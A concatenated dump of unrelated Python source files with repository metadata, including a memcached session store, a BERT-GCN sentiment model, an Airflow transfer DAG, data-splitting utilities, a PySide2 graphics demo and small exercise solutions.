self.secret = secret
self.memcached_address = memcached_address
self.session_timeout = session_timeout
def _fetch(self, session_id):
try:
mc = memcache.Client(self.memcached_address, debug=0)
session_data = raw_data = mc.get(session_id)
if raw_data != None:
mc.replace(session_id, raw_data, self.session_timeout, 0)
session_data = pickle.loads(raw_data)
if type(session_data) == type({}):
return session_data
else:
return {}
except IOError:
return {}
def get(self, request_handler = None):
if (request_handler == None):
session_id = None
hmac_key = None
else:
session_id = request_handler.get_secure_cookie("session_id")
hmac_key = request_handler.get_secure_cookie("verification")
if session_id == None:
session_exists = False
session_id = self._generate_id()
hmac_key = self._generate_hmac(session_id)
else:
session_exists = True
check_hmac = self._generate_hmac(session_id)
if hmac_key != check_hmac:
raise InvalidSessionException()
session = SessionData(session_id, hmac_key)
if session_exists:
session_data = self._fetch(session_id)
for key, data in session_data.iteritems():
session[key] = data
return session
def set(self, request_handler, session):
request_handler.set_secure_cookie("session_id", session.session_id)
request_handler.set_secure_cookie("verification", session.hmac_key)
session_data = pickle.dumps(dict(session.items()), pickle.HIGHEST_PROTOCOL)
mc = memcache.Client(self.memcached_address, debug=0)
mc.set(session.session_id, session_data, self.session_timeout, 0)
def _generate_id(self):
if isinstance(self.secret, str):
self.secret = str.encode(self.secret)
raw_id = self.secret + str.encode(str(uuid.uuid4()))
new_id = hashlib.sha256(raw_id)
return new_id.hexdigest()
def _generate_hmac(self, session_id):
print(type(session_id))
print(type(self.secret))
if isinstance(session_id,str):
session_id = str.encode(session_id)
if isinstance(self.secret, str):
self.secret = str.encode(self.secret)
return hmac.new(session_id, self.secret, hashlib.sha256).hexdigest()
class InvalidSessionException(Exception):
pass
| [
"donghaixing2010@hotmail.com"
] | donghaixing2010@hotmail.com |
4fa93a2c63b3b36b637bb87b00f004a255c1b366 | 8560ef45ce8366f8accddcfe672eb1d75bed8475 | /postag_and_none/gcnModel/My_model.py | 76c6b3888cb33fa8b1847f85b9ddba5c8493aac2 | [
"MIT"
] | permissive | taijizuomantou/aspect_level_sentiment | 9c31cdf6e5fc464f3019c9c8455cd7eb69506d10 | 9f8a2f96153aa49db43296f23b12f18fc87ecb4f | refs/heads/main | 2023-05-30T19:00:08.452088 | 2021-06-05T15:18:16 | 2021-06-05T15:18:16 | 374,141,876 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,811 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Sep 29 14:12:37 2019
@author: xue
"""
import copy
import json
import math
import six
import torch
import torch.nn as nn
from torch.nn import CrossEntropyLoss
from torch.nn.functional import softmax
from transformers import BertTokenizer, BertModel, BertForMaskedLM
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
MAX_LENGTH= 128
#class GCNClassifier(nn.Module):
# def __init__(self,num_labels):
# super().__init__()
# in_dim = 768
# self.gcn_model = GCNAbsaModel()
# self.classifier = nn.Linear(in_dim, num_labels)
# def forward(self, inputs):
# outputs = self.gcn_model(inputs)
# logits = self.classifier(outputs)
# return logits, outputs
class GCNAbsaModel(nn.Module):
def __init__(self):
super().__init__()
# gcn layer
self.gcn = GCN()
def forward(self, head, gcn_input):
# print("head"+ str(head.size()))
# print(head)
def inputs_to_tree_reps(head):
adj = np.zeros((MAX_LENGTH, MAX_LENGTH), dtype=np.float32)
for i in range(0,MAX_LENGTH):
if head[i] != -1 :
# adj[0][i] = 1
adj[i][head[i]] = 1
adj[i][i] = 1;
# adj[i][root] = 1
#adj = adj * adj
return adj
# adj = [inputs_to_tree_reps(onehead,typee,loc).reshape(1, MAX_LENGTH, MAX_LENGTH) for onehead in head]
adj = []
for i,onehead in enumerate(head):
adj.append(inputs_to_tree_reps(onehead).reshape(1, MAX_LENGTH, MAX_LENGTH) )
adj = np.concatenate(adj, axis=0)
adj = torch.from_numpy(adj)
adj.cuda()
h = self.gcn(adj, gcn_input)
#outputs = h
# avg pooling asp feature
# print(h.size())
# outputs = (h).sum(dim=2)
# print(outputs.size())
# print("outputs"+str(outputs.size()))
return h
class GCN(nn.Module):
def __init__(self, num_layers = 2,gcn_dropout = 0.5):
super(GCN, self).__init__()
self.gcn_drop = nn.Dropout(gcn_dropout)
# gcn layer
self.W = nn.ModuleList()
for layer in range(num_layers):
self.W.append(nn.Linear(768, 768))
def forward(self, adj, gcn_inputs,layer =2):
# gcn layer
#gcn_inputs.cuda()
denom = adj.sum(2).unsqueeze(2) + 1 # norm
# print("adj"+ str(adj.size()))
# print("gcn_inputs"+ str(gcn_inputs.size()))
for l in range(layer):
Ax = torch.bmm(adj.cuda(),gcn_inputs.cuda())
AxW = self.W[l](Ax)
AxW = AxW/ denom.cuda()
gAxW = F.relu(AxW)
gcn_inputs = self.gcn_drop(gAxW) if l < layer - 1 else gAxW
return gcn_inputs
class BertForSequenceClassification(nn.Module):
"""BERT model for classification.
This module is composed of the BERT model with a linear layer on top of
the pooled output.
Example usage:
```python
# Already been converted into WordPiece token ids
input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])
input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])
token_type_ids = torch.LongTensor([[0, 0, 1], [0, 2, 0]])
config = BertConfig(vocab_size=32000, hidden_size=512,
num_hidden_layers=8, num_attention_heads=6, intermediate_size=1024)
num_labels = 2
model = BertForSequenceClassification(config, num_labels)
logits = model(input_ids, token_type_ids, input_mask)
```
"""
def __init__(self, num_labels):
super(BertForSequenceClassification, self).__init__()
self.bert = BertModel.from_pretrained("./abc/")
self.dropout = nn.Dropout(0.1)
self.classifier_detection = nn.Linear(768, 2)
self.classifier_sentiment = nn.Linear(768, 4)
self.embedding = nn.Embedding(5,768)
#self.embedding.weight.data.copy_(self.load_aspect_embedding_weight())
self.we_d = nn.Linear(768,768)
self.we_c = nn.Linear(768,768)
self.wh_d = nn.Linear(768,768)
self.wh_c = nn.Linear(768,768)
self.wa_d = nn.Linear(768,768)
self.wa_c = nn.Linear(768,768)
self.w_d = nn.Linear(768,1)
self.w_c = nn.Linear(768,1)
self.softmax_d = nn.Softmax(dim=1)
self.softmax_c = nn.Softmax(dim=1)
self.gcn = GCNAbsaModel()
# self.var = torch.tensor(0.9,dtype=torch.float, device="cuda",requires_grad=True)
def load_aspect_embedding_weight(self):
f = open("aspect_embedding/aspect_embedding.txt","r")
weight = []
while True:
line = f.readline()
if len(line) ==0:break
item = line.split()
aspect = []
for num in item:
num = float(num)
aspect.append(num)
weight.append(aspect)
myw = torch.tensor(weight,dtype = torch.float)
return myw
def forward(self, input_ids, token_type_ids, attention_mask, class_labels, detection_lablels,aspects,all_noun_label,all_sent,head):
aspect_index = torch.tensor([3976,2060,2833,25545,2326]);
# print(aspects)
Neg_INF = -1e10
encode, pooled_output = self.bert(input_ids, attention_mask=attention_mask,token_type_ids= token_type_ids,)
#print(encode.size())
pooled_output = self.dropout(pooled_output)
encode = self.dropout(encode)
# detection_logits = self.classifier_detection(pooled_output)
# sentiment_logits = self.classifier_sentiment(pooled_output)
aspect_embed = self.embedding(aspects)
# aspect_embed = self.bert.embeddings.word_embeddings(aspect_index[aspects].cuda()).cuda()
aspect_embed = aspect_embed.unsqueeze(1)
full_aspect_embed = aspect_embed.expand(-1,128,768)
noun_label = all_noun_label.unsqueeze(-1)
temp_noun_label = noun_label.repeat(1,1,1)
noun_label = temp_noun_label * Neg_INF + 1#* self.var
# detect_encode = encode * noun_label
#detect_encode = self.dropout(detect_encode)
Md = self.wh_d(encode)*(full_aspect_embed)#+self.we_d(encode)
attention_d = self.softmax_d(self.w_d(Md) * noun_label)
temp_encode = encode.permute(0,2,1)
r_d = torch.bmm(temp_encode,attention_d).squeeze(-1)
detection_logits = self.classifier_detection(r_d)
my_d = encode * attention_d
abc = self.gcn(head,my_d)
sent_label = all_sent.unsqueeze(-1)
temp_sent_label = sent_label.repeat(1,1,1)
un_noun_label =temp_sent_label* Neg_INF + 1
#un_noun_label =( 1.0 - temp_noun_label) * Neg_INF + 1
#sent_encode = encode * un_noun_label
Mc = self.wh_c(encode)*(full_aspect_embed)+self.we_c(Md) + abc
attention_c = self.softmax_c(self.w_c(Mc) * un_noun_label) #+ attention_d
# attention_c = attention_c + attention_d
temp_encode = encode.permute(0,2,1)
r_c = torch.bmm(temp_encode,attention_c).squeeze(-1)
sentiment_logits = self.classifier_sentiment(r_c)
# print(attention_d.size())
loss_fct = CrossEntropyLoss()
loss = loss_fct(detection_logits, detection_lablels)
loss_fct_2 = CrossEntropyLoss(ignore_index=4)
loss = loss + loss_fct_2(sentiment_logits,class_labels)
#print(attention_d.size())
attention_d = attention_d.squeeze(-1)
# attention_c = attention_c.squeeze(-1)
# #print(attention_d.size())
# #print(attention_d.permute(1,0).size())
#
# detection_labels = .
sizee = full_aspect_embed.size(0)
# # print(sizee)
my_detection_labels = detection_lablels.gt(0)
# print(my_detection_labels)
my_detection_labels = my_detection_labels.repeat(128,1).permute(1,0)
# print(my_detection_labels.size())
# print(attention_d.size())
detect_attention_d = torch.masked_select(attention_d,my_detection_labels)
attention_loss_d = 1 - torch.sum(torch.mul(detect_attention_d,detect_attention_d))/sizee
# if(attention_loss_d < 0):
# print(attention_loss_d)
# print(attention_d)
# attention_loss_c = 1 - torch.sum(torch.mul(attention_c,attention_c))/sizee
#print( torch.sum(torch.mul(attention_d,attention_d)))
loss = loss +attention_loss_d #+attention_loss_c
# print(self.var)
# attention_loss_c = 1 - torch.sum(torch.mul(attention_c,attention_c))/sizee
# loss = loss + attention_loss_c
return loss, detection_logits,sentiment_logits | [
"719222033@qq.com"
] | 719222033@qq.com |
6978a14d61f5e732c14d26d2b0b74e1205218b1e | 20971847b3f7f2655c74986469688402e298365e | /w5/4.py | e2586424a3bed040ead58d35267f4a27d4cd3e8c | [] | no_license | pythonium/mipt_hw_py | da5c3046a4bebf732c3cb239b3fd8a95fdcbc756 | 884defc6698ea74dfb0b3e8c41cc9c05a5572e07 | refs/heads/master | 2023-06-04T03:44:31.600105 | 2020-12-21T12:31:32 | 2020-12-21T12:31:32 | 298,569,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | class Shape():
def __init__(self, height, length):
self.height = height
self.length = length
def get_area(self):
raise NotImplementedError()
class Triangle(Shape):
def get_area(self):
area = (self.height * self.length)/2
return area
class Rectangle(Shape):
def get_area(self):
area = self.height * self.length
return area
t = Triangle(3, 4)
print(t.get_area())
r = Rectangle(3, 4)
print(r.get_area())
| [
"artiukh.va@phystech.edu"
] | artiukh.va@phystech.edu |
0bf7dd56ef9f8d3dc81a166b9e292152ff8911ac | 2aba3c043ce4ef934adce0f65bd589268ec443c5 | /AOJ/courses/ITP1/3_C.py | 221621fc02dd16be341b7f831191bed733e02394 | [] | no_license | kambehmw/algorithm_python | 4f66593b77039d90515d1fcbecacdab8c811b92f | 17222399dcc92fd8f908e5774a9883e2e89c486e | refs/heads/master | 2020-06-02T12:44:11.322356 | 2020-05-18T13:22:05 | 2020-05-18T13:22:05 | 191,157,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | while True:
x, y = map(int, input().split())
if x == 0 and y == 0:
exit()
else:
if x < y:
print(x, y)
else:
print(y, x) | [
"kanbe.hmw@gmail.com"
] | kanbe.hmw@gmail.com |
d8adcfa0328f753994b60200ace6ca4d145e0f23 | 3d5bcd57b893c95bbcbfafe77bbc33c65432c9ed | /Algorithms/LeetCode/L0079exist.py | c6486ef5bca5b6781c64631e90da4eed40b18976 | [] | no_license | arunachalamev/PythonProgramming | c160f34c7cb90e82cd0d4762ff9dcb4abadf9c1c | ea188aaa1b72511aeb769a2829055d0aae55e73e | refs/heads/master | 2021-06-04T03:50:37.976293 | 2020-11-12T19:52:28 | 2020-11-12T19:52:28 | 97,364,002 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 702 | py |
def exist(board, word):
m,n = len(board), len(board[0])
def search(i,j,word):
nonlocal m,n
if len(word) == 0:
return True
if i<0 or i==m or j <0 or j==n or board[i][j] !=word[0]:
return False
board[i][j] = '#'
for di,dj in [(0,1),(0,-1),(1,0),(-1,0)]:
if search (i+di, j+dj , word[1:]):
return True
board[i][j] = word[0]
return False
for i,row in enumerate(board):
for j,_ in enumerate(row):
if search(i,j,word):
return True
return False
print (exist([
['A','B','C','E'],
['S','F','C','S'],
['A','D','E','E']
], 'ABCCEDX')) | [
"arunachalamev@gmail.com"
] | arunachalamev@gmail.com |
1cc0adc5290897487fb3cebc76c77f1b77f1045f | 21197acf6174f971129de1430a835078d1007fc3 | /Maestro/venv/Scripts/easy_install-3.6-script.py | ea5f671fa14190a56ba5840de3db399aff53073b | [] | no_license | khrisnakamarga/roboticeyetracker | 742056921a485185db1fc8d7b61979e294345614 | 0d629ed2de546ab87720a0e0bb39d4118d97af51 | refs/heads/master | 2020-04-20T09:17:10.890610 | 2019-06-13T01:05:42 | 2019-06-13T01:05:42 | 168,761,554 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 474 | py | #!"C:\Users\Khrisna Adi Kamarga\PycharmProjects\Maestro\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.6'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.6')()
)
| [
"khrisna@uw.edu"
] | khrisna@uw.edu |
5e16b4a54f5d2c337a515df81ead29768326edb9 | b8a1de0ce5bd93dd15c39b9391ebd37bb0b85acf | /Metodos_Numerico/met-elim-exemplo.py | 7df28e1d97174fd3fc279f96e0ee2af221dc32d1 | [] | no_license | brunolobell/calculo-numerico | 69993428e936ae997a12652a2c42f3b28922d559 | 9ecffd551d4c43c2439127fb8bef42bfda4e08b4 | refs/heads/master | 2023-06-20T16:41:11.243225 | 2021-07-19T17:59:21 | 2021-07-19T17:59:21 | 298,431,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,759 | py | import numpy as np
def gaussjac(A,B,p):
# x => vetor solucao
# k => n de iteracoes
# a,b => matriz e vetor do sistema
# p => precisao
n = np.max(np.shape(A))
k = 0
x0 = np.zeros(n)
alf = np.zeros(n)
for i in range(n):
x0[i] = 1
s = 0
for j in range(n):
if j != i:
s = s + abs(A[i][j])
alf[i] = s/abs(A[i][i])
x = np.zeros(n)
if np.max(alf) < 1:
test = 1000
while test > p:
k += 1
for i in range(n):
s = 0
for j in range(n):
if j != i:
s = s + (A[i][j] * x0[j])
x[i] = (B[i] - s) / A[i][i]
test = np.max(np.absolute(x - x0))
x0 = x.copy()
x = np.transpose(x)
else:
x='Não converge'
return x, k
def gausssid(A,B,p):
# x => Vetor Solucao
# k => n iteracoes
# a,b => matriz e vetor do sistema
# p => precisao
n = np.max(np.shape(A))
k = 0
x0 = np.zeros(n)
bet = np.zeros(n)
for i in range(n):
x0[i] = 0.5
s = 0
for j in range(n):
if j != i:
if j > i:
s = s + abs(A[i][j])
else:
s = s + (bet[j] * abs(A[i][j]))
bet[i] = s / abs(A[i][i])
x = np.full(n, 0.5)
if np.max(bet) < 1:
teste = 1000
while teste > p:
k += 1
for i in range(n):
s = 0
for j in range(n):
if j != i:
s = s + (A[i][j] * x[j])
x[i] = (B[i] - s)/A[i][i]
teste = np.max(np.absolute(x - x0))
x0 = x.copy()
x = np.transpose(x)
else:
x = 'Não Converge'
return x, k
A = np.array([[10,-1,1],[2,-8,-1],[3,-4,6]])
print(A)
B = np.array([[1],[-7],[5]])
print(B)
print(gaussjac(A,B,10**(-10))) | [
"brunolobell2@gmail.com"
] | brunolobell2@gmail.com |
690be92bc4c100a3e5a2d7daa4f95f72525baeba | 262e4b8eedca76db35f365ef6c0fb8bc66859d2c | /lab2/rectangle.py | e9e5b845fd3883e39f24cbce82cdc865bde22b24 | [] | no_license | xgamez/lab-5-sem | 601b0f694f5006a826bc8222f4be4b3010f32eec | aa08dfae3cf45ce82cc8e0ecd24208d33afd28cc | refs/heads/master | 2023-02-22T05:31:32.616017 | 2021-01-28T13:39:46 | 2021-01-28T13:39:46 | 297,439,424 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,437 | py | from figure import Figure
from figurecolor import FigureColor
class Rectangle(Figure):
"""
Класс «Прямоугольник» наследуется от класса «Геометрическая фигура».
"""
FIGURE_TYPE = "Прямоугольник"
@classmethod
def get_figure_type(cls):
return cls.FIGURE_TYPE
def __init__(self, color_param, width_param, height_param):
"""
Класс должен содержать конструктор по параметрам «ширина», «высота» и «цвет». В конструкторе создается объект класса «Цвет фигуры» для хранения цвета.
"""
self.width = width_param
self.height = height_param
self.fc = FigureColor()
self.fc.colorproperty = color_param
def square(self):
"""
Класс должен переопределять метод, вычисляющий площадь фигуры.
"""
return self.width*self.height
def __repr__(self):
return '\033[34m{}\033[0m {} цвета шириной {} и высотой {} площадью {}.'.format(
Rectangle.get_figure_type(),
self.fc.colorproperty,
self.width,
self.height,
self.square()
)
| [
"noreply@github.com"
] | noreply@github.com |
e1c7467f290a0ff997e0765bd20992139eacda23 | 9cf0e51720a58e648141cc7e1fd927a9c04a8a15 | /data/utils.py | 7c92a6ba99e9328956e7c382d3ce6e42b11a3da0 | [
"MIT"
] | permissive | wubinzzu/NeuRec | 8c7c0217f304b64b4673baeea12b0e610b664747 | 9e9391bfe45f65977b0b06dfb8f7feae5e760286 | refs/heads/master | 2023-08-23T14:56:18.663462 | 2021-11-26T07:41:48 | 2021-11-26T07:41:48 | 172,490,285 | 1,107 | 237 | null | 2023-03-24T22:42:26 | 2019-02-25T11:05:36 | Python | UTF-8 | Python | false | false | 3,272 | py | """
@author: Zhongchuan Sun
"""
import pandas as pd
import math
import hashlib
import os
def check_md5(file_name):
if not os.path.isfile(file_name):
raise FileNotFoundError("There is not file named '%s'!" % file_name)
with open(file_name, "rb") as fin:
bytes = fin.read() # read file as bytes
readable_hash = hashlib.md5(bytes).hexdigest()
return readable_hash
def load_data(filename, sep, columns):
data = pd.read_csv(filename, sep=sep, header=None, names=columns)
return data
def filter_data(data, user_min=None, item_min=None):
data.dropna(how="any", inplace=True)
if item_min is not None and item_min > 0:
item_count = data["item"].value_counts(sort=False)
filtered_idx = data["item"].map(lambda x: item_count[x] >= item_min)
data = data[filtered_idx]
if user_min is not None and user_min > 0:
user_count = data["user"].value_counts(sort=False)
filtered_idx = data["user"].map(lambda x: user_count[x] >= user_min)
data = data[filtered_idx]
return data
def remap_id(data):
unique_user = data["user"].unique()
user2id = pd.Series(data=range(len(unique_user)), index=unique_user)
data["user"] = data["user"].map(user2id)
unique_item = data["item"].unique()
item2id = pd.Series(data=range(len(unique_item)), index=unique_item)
data["item"] = data["item"].map(item2id)
return data, user2id, item2id
def get_map_id(data):
unique_user = data["user"].unique()
user2id = pd.Series(data=range(len(unique_user)), index=unique_user)
unique_item = data["item"].unique()
item2id = pd.Series(data=range(len(unique_item)), index=unique_item)
return user2id.to_dict(), item2id.to_dict()
def split_by_ratio(data, ratio=0.8, by_time=True):
if by_time:
data.sort_values(by=["user", "time"], inplace=True)
else:
data.sort_values(by=["user", "item"], inplace=True)
first_section = []
second_section = []
user_grouped = data.groupby(by=["user"])
for user, u_data in user_grouped:
u_data_len = len(u_data)
if not by_time:
u_data = u_data.sample(frac=1)
idx = math.ceil(ratio*u_data_len)
first_section.append(u_data.iloc[:idx])
second_section.append(u_data.iloc[idx:])
first_section = pd.concat(first_section, ignore_index=True)
second_section = pd.concat(second_section, ignore_index=True)
return first_section, second_section
def split_by_loo(data, by_time=True):
if by_time:
data.sort_values(by=["user", "time"], inplace=True)
else:
data.sort_values(by=["user", "item"], inplace=True)
first_section = []
second_section = []
user_grouped = data.groupby(by=["user"])
for user, u_data in user_grouped:
u_data_len = len(u_data)
if u_data_len <= 3:
first_section.append(u_data)
else:
if not by_time:
u_data = u_data.sample(frac=1)
first_section.append(u_data.iloc[:-1])
second_section.append(u_data.iloc[-1:])
first_section = pd.concat(first_section, ignore_index=True)
second_section = pd.concat(second_section, ignore_index=True)
return first_section, second_section
| [
"iezcsun@gs.zzu.edu.cn"
] | iezcsun@gs.zzu.edu.cn |
393141123c2bff2f5a54636ca0bcb17fcc5d2927 | b3b8db13b83d7dcda1afd8640eeed2b9d3df9cdc | /transfer/dags/transfer.py | c4c688495cb0ff4b5add6ddcb3ed5fb276163c2d | [] | no_license | grokkerzz/airflow_job | eeffab67718b90467b09103dfbe8eea2a03cb6b2 | 9542daf16f1251dddad52357d4385e7804e66a29 | refs/heads/master | 2023-05-11T15:19:16.292091 | 2019-09-12T03:38:37 | 2019-09-12T03:38:37 | 207,725,132 | 0 | 0 | null | 2023-05-08T20:28:20 | 2019-09-11T04:45:51 | Dockerfile | UTF-8 | Python | false | false | 861 | py | from __future__ import print_function
from datetime import datetime
from datetime import timedelta
import airflow
from airflow.models import DAG
from airflow.operators.bash_operator import BashOperator
args = {
'owner': 'airflow',
'run_as_user': 'root',
'start_date': airflow.utils.dates.days_ago(2),
}
dag = DAG(
dag_id='transfer_mysql_and_csv_to_postgres',
default_args=args,
schedule_interval='0 0 * * *',
dagrun_timeout=timedelta(minutes=60),
)
mysql_to_postgres = BashOperator(
task_id='transfer_data_from_mysql_to_postgres',
bash_command="/usr/local/airflow/bashcommand/mysql_to_postgres.sh ",
dag=dag
)
csv_to_postgres = BashOperator(
task_id='transfer_data_from_csv_to_postgres',
bash_command="/usr/local/airflow/bashcommand/csv_to_postgres.sh ",
dag=dag
)
mysql_to_postgres >> csv_to_postgres
| [
"phuong.nguyen@dinovative.com"
] | phuong.nguyen@dinovative.com |
62c9707a1856156262ef41e416de9dc8f0816af2 | 34febb6e20d0461862bc03d6d6d738335644b5c8 | /tadhack/manage.py | 5becd0dd4a44a06d2e638762384a28a6ab3573b9 | [] | no_license | prosper1/verify-my-prescription | e9011592e11300c3d8fdddfa6223882640e705ce | 55ff92133919186d05514faa5b2df8a71f78d4f9 | refs/heads/main | 2022-12-27T15:41:39.442310 | 2020-10-11T08:58:52 | 2020-10-11T08:58:52 | 302,725,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tadhack.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"gundotshili@gmail.com"
] | gundotshili@gmail.com |
a1e75d8649dc7b3cba5ad57ba9be33908ab46e99 | b5e3b4b8e2c70e06e3b19bcd86789b83028da78f | /django_project/blog/migrations/0010_auto_20190620_2016.py | bba9cbb55a28a13c6ceef32ab6ddce4d10faf094 | [] | no_license | feridbedelov/Django_Project_Blog_Aurora | 334593d2d523f38e7c472b6e8439cd19f777ec6a | 130f3db455590333c45d40c042722f5908e7bb32 | refs/heads/master | 2020-07-31T15:47:39.431799 | 2019-09-24T17:41:33 | 2019-09-24T17:41:33 | 210,662,296 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | # Generated by Django 2.2.1 on 2019-06-20 16:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0009_auto_20190620_2016'),
]
operations = [
migrations.AlterField(
model_name='post',
name='rating',
field=models.FloatField(default=5.5),
),
]
| [
"User@DESKTOP-K24KG53"
] | User@DESKTOP-K24KG53 |
c73a3c6348b392d2b4b0ff13896dd6ddb2cbc87b | 3d7435ffae4cccde624deed9bd5edce7cd020284 | /Python_Project/venv/user_input_file_ReadnWrt.py | 78ab639472a5933a8f94bdd11b0e1a13b9e24e35 | [] | no_license | Nidhibaghel88/test-teamcity | 066559df727afc5e47277f996959fa11b7488393 | 78c69bf5a1391e3dc21b30855372e9290afd91a2 | refs/heads/master | 2020-04-08T04:23:00.492155 | 2018-11-25T19:12:55 | 2018-11-25T19:12:55 | 159,013,934 | 0 | 0 | null | 2018-11-25T18:16:43 | 2018-11-25T08:55:55 | Python | UTF-8 | Python | false | false | 1,053 | py | def file_overwrite(filename, n):
with open(filename, 'r+') as f:
content = f.read()
print(content)
while True:
feedback = input("Type 'y' to overwrite the file or 'n' to exit: ")
if feedback.lower() == 'y':
# move the file pointer back to the start and then truncate the file
f.seek(0)
f.truncate()
break
elif feedback.lower() == 'n':
# return instantly, another advantage of using a function
return
else:
print("Please enter either 'y' or 'n'.")
print('Write {} lines to the file.'.format(n))
lines = []
for line_num in range(1, n + 1):
line = input('line {}: '.format(line_num))
lines.append(line)
f.write('\n'.join(lines))
with open(filename, 'r+') as f:
content = f.read()
print(content)
file_overwrite('C:/Users/nidhi.baghel/OneDrive - Shell/Documents/Python/venv/sample.txt', 3)
| [
"Nidhi.Baghel@shell.com"
] | Nidhi.Baghel@shell.com |
8fe3e2ec9bb3eb665413698d3bb7206359767fd8 | c9bc6a21768950ef010c52cc55c3e784af509e7a | /gview3.py | b5a59a0d40c82ed8b140bd14d46a4a016b6f6488 | [] | no_license | aamirglb/PythonTest | f97b93f76f238dc507031cd1cfdbdba4dffd88ee | fec366ed88d627a60df8c4b376a4e9cced23433f | refs/heads/master | 2020-05-07T18:30:36.196372 | 2019-11-05T04:23:29 | 2019-11-05T04:23:29 | 180,769,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,754 | py | from PySide2.QtWidgets import (QApplication, QGraphicsView, QGraphicsScene, QGraphicsItem, QGraphicsRectItem,
QWidget, QGraphicsSimpleTextItem, QGraphicsEllipseItem, QGraphicsPolygonItem, QGraphicsItem,
QMenu, QAction)
from PySide2.QtGui import (QPen, QBrush, QPolygonF, QPainter, QFont, )
from PySide2.QtCore import (Qt, QRectF, QPoint, QPointF, QTimer )
import sys
class SlotItem(QGraphicsItem):
def __init__(self, id, parent=None):
super(SlotItem, self).__init__(parent)
self.width = 100
self.height = 70
self.id = id
def boundingRect(self):
return QRectF(0, 0, self.width, self.height)
def paint(self, painter, option, widget):
rect = self.boundingRect()
painter.drawRect(rect)
font = painter.font()
font.setPixelSize(12)
font.setWeight(QFont.Bold)
painter.setFont(font)
painter.drawText((self.width/2)-4, 15, f'{self.id}')
def contextMenuEvent(self, event):
self.menu = QMenu()
self.showModeAction = QAction(f'Slot {self.id}')
self.menu.addAction(self.showModeAction)
self.menu.exec_(event.screenPos())
class BracketItem(QGraphicsItem):
def __init__(self, id):
super(BracketItem, self).__init__()
self.zoomFactor = 1
self.rootSlot = SlotItem(1, self)
self.leftChild = SlotItem(2, self)
self.rightChild = SlotItem(3, self)
self.rootSlot.setPos(120, 20)
self.leftChild.setPos(20, 140)
self.rightChild.setPos(220, 140)
self.scaleFactor = 1
def boundingRect(self):
return QRectF(0, 0, 340, 230)
def paint(self, painter, option, widget):
# self.scaleFactor -= 0.1
# painter.scale(self.scaleFactor, self.scaleFactor)
rect = self.boundingRect()
painter.drawRect(rect)
painter.drawLine(170, 90, 70, 140)
painter.drawLine(170, 90, 270, 140)
def contextMenuEvent(self, event):
self.menu = QMenu()
self.showModeAction = QAction('Bracket')
self.menu.addAction(self.showModeAction)
self.menu.exec_(event.screenPos())
def timerHandler():
bracket1.scaleFactor -= 0.1
print(f'scaleFactor: {bracket1.scaleFactor}')
bracket1.setScale(bracket1.scaleFactor)
if bracket1.scaleFactor < 0.5:
timer.stop()
if __name__ == '__main__':
app = QApplication(sys.argv)
scene = QGraphicsScene(QRectF(-50, -50, 500, 400))
# scene.addItem(QGraphicsRectItem(scene.sceneRect()))
bracket1 = BracketItem(1)
scene.addItem(bracket1)
timer = QTimer()
timer.setInterval(7000)
timer.timeout.connect(timerHandler)
view = QGraphicsView()
view.setScene(scene)
view.show()
timer.start()
sys.exit(app.exec_()) | [
"aamirglb@users.noreply.github.com"
] | aamirglb@users.noreply.github.com |
5070fa0e732ec8a3253007ddb99b24015204161d | b8b8b36049217e4da9c3693beeeae74a0d97f875 | /min-cost-climbing-stairs.py | 394b7afd0ee41d0781ad03a6437a1237e043912a | [] | no_license | xichagui/algorithm | e9d94a8ac06c6b5d791ed540142fc22f83ef41f2 | 5d4114bc9d77f80da26374168ab289dfe22099f4 | refs/heads/master | 2021-06-20T03:20:55.637823 | 2021-01-13T17:57:05 | 2021-01-13T17:57:05 | 66,262,380 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py | class Solution:
def minCostClimbingStairs(self, cost: List[int]) -> int:
for i in range(2, len(cost)):
cost[i] += min(cost[i - 1], cost[i - 2])
return min(cost[-1], cost[-2])
| [
"xichagui@gmail.com"
] | xichagui@gmail.com |
395d19943263cbfba1bdb00171a56181ec34b3cb | ec6c7bb9b880b893b8a5676d62f3797e5e709968 | /tests.py | c01f3164a4da5ae079379555335b5af943e57a99 | [] | no_license | jeffmay/maize | a1e18dcf58bf9bd3d7639858e605865efa44ed41 | 7dd2a114a56085c556cb50542f844331ac1fa116 | refs/heads/master | 2021-01-23T11:49:24.229054 | 2012-06-15T12:09:41 | 2012-06-15T12:09:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,803 | py | import unittest
from vector import *
class VectorTests(unittest.TestCase):
def test_init(self):
self.assertEqual(vector(), tuple())
self.assertEqual(vector(()), tuple())
self.assertEqual(vector([]), tuple())
self.assertEqual(vector((1,)), (1,))
self.assertEqual(vector([1]), (1,))
def test_v(self):
self.assertEqual(v(), vector())
self.assertEqual(v(1), vector([1]))
self.assertEqual(v(1,2), vector([1,2]))
